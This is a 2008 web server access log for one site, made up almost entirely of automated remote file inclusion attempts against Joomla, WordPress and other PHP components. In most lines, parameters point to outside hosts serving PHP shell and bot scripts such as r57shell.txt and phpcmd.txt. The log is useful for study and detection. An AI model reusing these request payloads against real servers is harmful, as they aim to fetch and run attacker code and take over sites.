83.102.242.34 - - [17/Jun/2008:09:35:12 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.189.137 - - [17/Jun/2008:09:35:19 -0700] "GET /index.php?http://www.realmadrid.caucasus.net/r57shell.txt?? HTTP/1.1" 200 18379 "-" "libwww-perl/5.810" "dmulk.com"
67.195.58.182 - - [17/Jun/2008:09:35:29 -0700] "GET /logs/access_080118.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.120.32.19 - - [17/Jun/2008:09:35:33 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.120.32.19 - - [17/Jun/2008:09:35:33 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.120.32.19 - - [17/Jun/2008:09:35:33 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.120.32.19 - - [17/Jun/2008:09:35:41 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [17/Jun/2008:09:35:44 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [17/Jun/2008:09:35:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:35:45 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:35:46 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.220 - - [17/Jun/2008:09:35:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:35:46 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:35:52 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:35:52 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [17/Jun/2008:09:35:54 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:35:55 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.252.133.12 - - [17/Jun/2008:09:36:46 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.252.133.12 - - [17/Jun/2008:09:36:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:09:37:00 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:37:11 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.31 - - [17/Jun/2008:09:37:40 -0700] "GET /bikes/dteel/2008_02_23/?M=D HTTP/1.1" 200 1556 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:09:38:15 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:09:38:16 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:38:26 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:38:26 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:38:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:38:27 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:38:37 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:38:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:38:38 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:38:40 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:39:23 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:39:23 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:39:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:39:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:40:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:40:42 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:40:42 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:40:47 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.friendsofnarconon.org/modules/is/Osryid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:40:48 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.friendsofnarconon.org/modules/is/Osryid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:40:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:40:57 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.friendsofnarconon.org/modules/is/Osryid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:40:57 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.friendsofnarconon.org/modules/is/Osryid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.140.139 - - [17/Jun/2008:09:40:59 -0700] "GET /logs/access_080122.log//wp-content/plugins/wordtube/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:41:02 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.friendsofnarconon.org/modules/is/Osryid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:41:02 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.friendsofnarconon.org/modules/is/Osryid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:41:06 -0700] "GET /logs/access_080225.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:41:06 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:41:06 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:41:51 -0700] "GET /logs/access_080225.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:41:52 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:41:52 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:41:54 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.233.66 - - [17/Jun/2008:09:42:01 -0700] "GET /logs/access_080312.log//index.php?sourcedir=http://juliankazandjiev.info/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.233.66 - - [17/Jun/2008:09:42:06 -0700] "GET //index.php?sourcedir=http://juliankazandjiev.info/file/id2.txt?? HTTP/1.1" 200 18421 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.233.66 - - [17/Jun/2008:09:42:07 -0700] "GET /logs//index.php?sourcedir=http://juliankazandjiev.info/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:42:30 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.117.140.139 - - [17/Jun/2008:09:42:34 -0700] "GET /logs//wp-content/plugins/wordtube/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.140.139 - - [17/Jun/2008:09:42:34 -0700] "GET //wp-content/plugins/wordtube/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.233.66 - - [17/Jun/2008:09:42:37 -0700] "GET /logs//index.php?sourcedir=http://juliankazandjiev.info/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.233.66 - - [17/Jun/2008:09:42:38 -0700] "GET //index.php?sourcedir=http://juliankazandjiev.info/file/id2.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:42:47 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:42:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:42:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:42:59 -0700] "GET /logs/access_080302.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:42:59 -0700] "GET /logs/access_080312.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:43:10 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:43:10 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:43:48 -0700] "GET /logs/access_080312.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:44:05 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:44:11 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:44:25 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:44:28 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:44:28 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:44:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:44:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:44:58 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:44:58 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.49.145.16 - - [17/Jun/2008:09:45:32 -0700] "GET /main.php?page=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.49.145.16 - - [17/Jun/2008:09:45:32 -0700] "GET /logs/main.php?page=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:45:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:45:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:45:46 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:09:45:46 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [17/Jun/2008:09:45:49 -0700] "GET /logs/access_080215.log//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:46:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:46:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:19 -0700] "GET /logs//serweb//load_lang.php?_SERWEB[serwebdir]=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:19 -0700] "GET //serweb//load_lang.php?_SERWEB[serwebdir]=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [17/Jun/2008:09:47:29 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [17/Jun/2008:09:47:29 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:47:38 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:44 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:47:46 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.203 - - [17/Jun/2008:09:47:47 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:47 -0700] "GET //index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:48 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:47:49 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:50 -0700] "GET //index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:09:47:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.254.241.12 - - [17/Jun/2008:09:48:02 -0700] "GET //errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.254.241.12 - - [17/Jun/2008:09:48:04 -0700] "GET /logs//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.254.241.12 - - [17/Jun/2008:09:48:07 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.254.241.12 - - [17/Jun/2008:09:48:47 -0700] "GET /logs/access_080126.log//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.49.145.16 - - [17/Jun/2008:09:49:03 -0700] "GET /logs/main.php?page=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
200.49.145.16 - - [17/Jun/2008:09:49:04 -0700] "GET /main.php?page=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:49:19 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:49:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:49:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:49:25 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
193.254.241.12 - - [17/Jun/2008:09:49:56 -0700] "GET /logs/access_080215.log//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.39 - - [17/Jun/2008:09:50:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [17/Jun/2008:09:50:13 -0700] "GET /bikes/dteel/03MAR07/?D=D HTTP/1.1" 200 708 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
